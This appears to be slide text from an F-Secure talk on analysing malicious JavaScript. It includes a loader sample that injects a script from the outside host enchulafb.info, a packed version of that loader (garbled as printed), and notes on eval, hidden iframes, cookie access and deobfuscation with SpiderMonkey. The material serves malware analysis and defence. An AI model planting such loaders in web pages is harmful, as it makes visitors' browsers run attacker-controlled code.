Karmina Aquino F-Secure Corporation



Karmina Aquino
F-Secure Corporation
*&%*!
vbscript
javascript
!
1
Cross-browser
compatibility
2
Default HTML script
language
3
AJAX
4
Supported by
several applications
<script type='text/javascript'>
or
<script>
<!--***Javascript code***
-->
</script>
<script type='text/javascript' src='test.js'></script>
<iframe src ='test.js' width=0 height=0></iframe>
document.write()
eval()
location.reload()
location.replace()
location.href()
onLoad()
onUnload()
onSubmit()
// Slide sample (plaintext form): a loader that makes the visiting browser fetch
// and run a script from a third-party host. For triage, the things to pull out
// are the remote URL in the "src" attribute and the fact that the <script>
// element is created at runtime, so it never appears in the page's static HTML.
// A script-src allow-list (Content-Security-Policy) on the hosting page would
// keep the browser from loading the off-site file.

// The call precedes the definition; this works because function declarations are hoisted.
loadScript_YOU();
/**
 * Appends a <script> element with an external "src" to the document's <head>.
 *
 * @returns {boolean} false when the page protocol is 'https:' or when no
 *   <head> element is found; true once the element has been appended.
 */
function loadScript_YOU() {
// Do nothing on HTTPS pages. NOTE(review): presumably to avoid a mixed-content
// warning for the http:// script below; the sample itself does not say why.
if ('https:' == document.location.protocol) return false;
var s = document.createElement('script');
s.setAttribute("type","text/javascript");
// Remote script location: the network indicator for this sample.
s.setAttribute("src", "http://enchulafb.info/script.js");
var head=document.getElementsByTagName("head")[0];
// Loose == also matches undefined, which is what [0] yields when the page has no <head>.
if( head==null) return false;
// Attaching the element is what triggers the browser to fetch and execute the remote script.
head.appendChild(s);
return true;
}
Readable
decipherable
// The same loader after packing (the page attributes this format to Dean
// Edwards' packer). The first string argument is the payload with every
// identifier replaced by a base-29 token (c.toString(a), with a = 29); the
// unpacker swaps each token for the matching word of the '|'-separated
// dictionary and passes the rebuilt source to eval().
// The dictionary is readable as-is (document, createElement, script, src, http,
// enchulafb, info, js, appendChild), so the behaviour and the remote host can
// be recovered without executing anything.
// NOTE(review): `while(c-)` appears twice where the unpacker would need
// `while(c--)`, and the payload and dictionary strings are hard-wrapped
// mid-token ("se|tAttribute", "t|ext", "he|ad"). Both look like transcription
// artifacts of the slide; the text below is not runnable as printed.
// For analysis, have the outer eval print the unpacked string in an isolated
// JavaScript shell instead of executing it.
eval(function(p,a,c,k,e,r){e=function(c){return
c.toString(a)};if(!''.replace(/^/,String)){while(c-)r[e(c)]=k[c]||e(c);k=[function(e){return
r[e]}];e=function(){return'\\w+'};c=1};while(c-)if(k[c])p=p.replace(new
RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3();9
3(){4(\'b:\'==1.c.d)2 5;6
s=1.e(\'7\');s.8("f","g/h");s.8("i","j://k.l/7.m");6
a=1.n("o")[0];4(a==p)2 5;a.q(s);2
r}',29,29,'|document|return|loadScript_YOU|if|false|var|script|se
tAttribute|function||https|location|protocol|createElement|type|t
ext|javascript|src|http|enchulafb|info|js|getElementsByTagName|he
ad|null|appendChild|true|'.split('|'),0,{}))
Readable
decipherable
own obfuscation technique
Dean Edwards /packer/
eval(function(p,a,c,k,e,d)…
anti-debugging
arguments.callee.toString()
location.href
document.cookie
SpiderMonkey
• Test environment for Javascript engine
• Maintained by Mozilla
• Used for Static Analysis
Microsoft IE Developer Tools
• Tool for debugging scripts
• Developed by Microsoft
SPIDERMONKEY
js.exe -f wrapper.js -f malware.js
https://developer.mozilla.org/En/SpiderMonkey/Introduction_to_the_JavaScript_shell
Demo